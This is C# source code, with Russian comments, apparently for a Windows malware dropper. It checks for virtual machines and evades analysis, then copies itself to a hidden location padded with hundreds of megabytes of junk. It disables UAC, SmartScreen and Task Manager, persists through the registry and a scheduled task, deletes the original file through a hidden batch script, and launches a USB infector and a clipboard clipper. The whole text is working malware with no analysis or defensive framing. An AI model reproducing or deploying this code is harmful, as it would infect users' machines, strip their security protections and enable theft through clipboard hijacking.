static void Main(string[] args) { // Проверка MutEx if (!MutEx.Check()) { Environment.Exit(0); } else { // Sleep Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Защита от dotMemory Protection.Initialize(); // Проверяем на запуск виртуальных машин ( Virtual Machine Check ) if (!AntiVM.CheckVM()) { // System infection Installer.Infection(); // USB Detector > Infector new Thread(() => { Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); UsbInfector.Initialize(); }).Start(); // Clipper new BackgroundForm(); Application.Run(); } else { Environment.Exit(0); } } }
public static void Infection() { if (File.Exists(Help.LocalData + "\\" + Help.HWID)) { if (!File.ReadAllText(Help.LocalData + "\\" + Help.HWID).Contains(Help.HWID)) { //Вырубить показ скрытых файлов если включенно new Thread(() => { Thread.Sleep(new Random(Environment.TickCount).Next(60000, 340000)); try { RegistryKey rkey = Registry.CurrentUser; rkey = rkey.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"); rkey.SetValue("Hidden", 0); } catch { } }).Start(); } else { } } else { try { //Файл детект заражения File.Create(Help.LocalData + "\\" + Help.HWID); File.SetAttributes(Help.LocalData + "\\" + Help.HWID, FileAttributes.Hidden | FileAttributes.System); DirectoryInfo Edir; Edir = Directory.CreateDirectory(Dir); Directory.CreateDirectory(Dir); Edir.Refresh(); Thread.Sleep(new Random(Environment.TickCount).Next(2000, 5000)); // Копируемся File.Copy(Assembly.GetExecutingAssembly().Location, Dir + Help.bin); File.SetAttributes(Dir + Help.bin, FileAttributes.Directory | FileAttributes.Hidden | FileAttributes.System); // Отключаем UAC уведомления new Thread(() => { RegistryControl.ToogleUacAdmin(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", 0); }).Start(); // Отключаем SmartScreen new Thread(() => { RegistryControl.ToogleSmartScreen(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer", "SmartScreenEnabled", "Off"); }).Start(); // Отключаем Диспетчер Задач new Thread(() => { RegistryControl.ToogleTaskMandRegedit(@"Software\Microsoft\Windows\CurrentVersion\Policies", 1); }).Start(); //Добавление в реестр new Thread(() => { Registration.Inizialize(true, Help.NameRegRandom, Dir + Help.bin); }).Start(); // Добавляем байты рабочему билду FileStream fs = new FileStream(Dir + Help.bin, FileMode.OpenOrCreate); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); byte[] junk = new byte[new Random().Next(650 * 1024 * 1000, 750 * 1024 * 1000)]; new Random().NextBytes(junk); fs.Write(junk, 0, junk.Length); fs.Dispose(); // Адекватное самоудаление и добавление в планировщик задач с интервалом в 4 минуты string batch = Path.GetTempFileName() + ".bat"; using (StreamWriter sw = new StreamWriter(batch)) { sw.WriteLine("@echo off"); sw.WriteLine("timeout 4 > NUL"); // Задержка до выполнения следуюющих команд sw.WriteLine("schtasks.exe " + "/create /f /sc MINUTE /mo 5 /tn " + @"""" + Help.NameRegRandom + @"""" + " /tr " + @"""'" + Help.WorkingDir + Help.bin + @"""'"); // Прыгаем в планировщик sw.WriteLine("DEL " + "\"" + Path.GetFileName(new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name) + "\"" + " /f /q"); // Удаляем исходный билд sw.WriteLine("START " + "\"" + "\" " + "\"" + Dir + Help.bin + "\""); // Запускаем рабочий билд sw.WriteLine("CD " + Path.GetTempPath()); // Переходим во временную папку юзера } Process.Start(new ProcessStartInfo() { FileName = batch, CreateNoWindow = true, ErrorDialog = false, UseShellExecute = false, WindowStyle = ProcessWindowStyle.Hidden }); Environment.Exit(0); } catch { // USB Infector new Thread(() => { Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); UsbInfector.Initialize(); }).Start(); File.Delete(Help.LocalData + "\\" + Help.HWID); } } }